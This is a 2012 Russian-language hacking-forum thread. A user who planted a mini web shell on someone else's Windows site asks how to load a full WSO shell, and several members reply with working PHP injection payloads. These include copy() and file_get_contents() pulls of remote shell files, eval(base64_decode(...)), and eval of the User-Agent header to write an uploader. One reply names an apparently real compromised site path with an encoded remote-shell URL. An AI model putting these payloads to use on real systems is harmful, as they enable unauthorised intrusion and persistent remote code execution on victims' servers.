HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.04.2012, 00:59
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

Доброго времени суток.

Залился на сайт. Через время допустил ошибку и шелл снесли.

Оставил на сайте мини шелл.

Захожу, все работает, довольный сижу такой, думаю щас зальюсь. А тут ***....

mshell.php?p1r0=phpinfo(); - GOOD

mshell.php?p1r0=copy('http://site./wso.txt','./wso.php'); - BAD

На сервере винда....

От чего может такое быть? Как решать? Спасибо.
 
Ответить с цитированием

  #2  
Старый 17.04.2012, 01:05
ShellRoot
Guest
Сообщений: n/a
Провел на форуме:
630

Репутация: -5
По умолчанию

http://base64.ru/

Кодируешь PHP код, затем юзаешь так:

mshell.php?p1r0=eval(base64_decode());

без '', и если спец символы на хвосте ("равно" например), то просто убирай их.

Думаю, должно сработать...
 
Ответить с цитированием

  #3  
Старый 17.04.2012, 01:16
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

Не помогло, но спасибо.
 
Ответить с цитированием

  #4  
Старый 17.04.2012, 01:16
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

ShellRoot

base64_decode тоже принимает стринг, поэтому кaвычки обязательны

2 TC

copy($_GET[a],$_GET);&a=...&b=

или

file_put_contents($_GET[a],file_get_contents($_GET));&a=&b=

пригодится

http://php.su/functions/?stripslashes
 
Ответить с цитированием

  #5  
Старый 17.04.2012, 01:20
ShellRoot
Guest
Сообщений: n/a
Провел на форуме:
630

Репутация: -5
По умолчанию

Konqi, сколько раз без кавычек делал норм, достаточно стринг сделать так:

$a = (textstring);

но вот если используются спец.символы, такие как точки и т.п тогда уже надо, но мы специально заюзали без "равно", или иначе заюзать из глобальной переменной
 
Ответить с цитированием

  #6  
Старый 17.04.2012, 01:25
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от None  
phpinfo();
вот для начала и кури, что там выводится. Например allow_url_fopen = off - и всё, забудь про шелл с другого сайта - онли только грузить с локали.

Хочешь грамотный ответ - давай инфу по ключевым позициям. Из того же phpinfo. Что такое "там" ключевые позиции - думай сам.

PS: Прежде чем страдать херней и юзать всяческие аплоадеры - для начала найди папку, в которую ты можешь вообще писать в принципе, и проверить её еще на предмет запретных правил предварительно (ошибки вообще-то тоже фиксируются). На то у тебя уже есть огромные возможности - выполняется phpinfo() - Значит в твоем распоряжении вся мощь языка ПИЭЙЧПИ.

Кстати, стыдно задавать такие вопросы, если phpinfo() выполняется. И никакие статьи это не реабилитируют.

У тебя уже есть выполнение php-кода. Вообще-то это равно иметь шелл. Думай
 
Ответить с цитированием

  #7  
Старый 17.04.2012, 01:51
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

Pashkela, стыдно задавать такие вопросы, но если их не задавать, то стыдится прийдется всегда!

Спасибо, вот щас сижу, думаю.

Цитата:
Сообщение от None  
allow_url_fopen On
allow_url_include Off
disable_functions exec,passthru,shell_exec,system,proc_open,popen
file_uploads On
magic_quotes_gpc On
Странно то, что под бэйс64 кавычки выполняются на ура... Тоесть mq тут не причем.

UPD

________________________________________

Пробовал осздать файл, не помогло, не создается.... Идеи?
 
Ответить с цитированием

  #8  
Старый 17.04.2012, 03:10
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pirotexnik  
Pirotexnik said:
Pashkela, стыдно задавать такие вопросы, но если их не задавать, то стыдится прийдется всегда!
Спасибо, вот щас сижу, думаю.
Странно то, что под бэйс64 кавычки выполняются на ура... Тоесть mq тут не причем.
UPD
________________________________________
Пробовал осздать файл, не помогло, не создается.... Идеи?
Еще как при чем. magic_quotes_gpc режет GPC массивы. Кавычки `бейсятся` и естественно пропускаются через magic_quotes попадая далее в последующую функцию.

Далее по делу:

http://site/?cmd=eval($_SERVER[HTTP_USER_AGENT]);

И модифицируй к виду HEADER: HTTP_USER_AGENT-> file_put_content('uploader.php','upload php code');

Это если php5 - если 4 пофантазируй. В пути также на директорию должны быть права.

Я не знаю какие у тебя ограничения в твоем случае. Мб поможет, в данном случае использование не GPC массива снимет слеширование через magic_quotes и прозволит использовать кавычки и указывать пути.
 
Ответить с цитированием

  #9  
Старый 17.04.2012, 03:21
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode (тут_без_кавычек_адрес_твое о_шелла_например_http://site/shell.txt_только_в_base64)));

т.е. что-то типо этого:

http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode (aHR0cDovL3NpdGUvd3NvMl9ldmFsLnR4dA)));

НО, сначала почитай:

/thread191917.html

посмотри на дату и пусть тебе станет стыдно

PS: пох на права, шелл там льется за 2 секунды

Не проверял, но по моему легко зальется wso pack shell - т.е. упакованный (размер имеет значение )
 
Ответить с цитированием

  #10  
Старый 17.04.2012, 21:47
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

Никак не выходит... И не у меня одного, ещё пару человек пробовало. Далеко не новечки...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ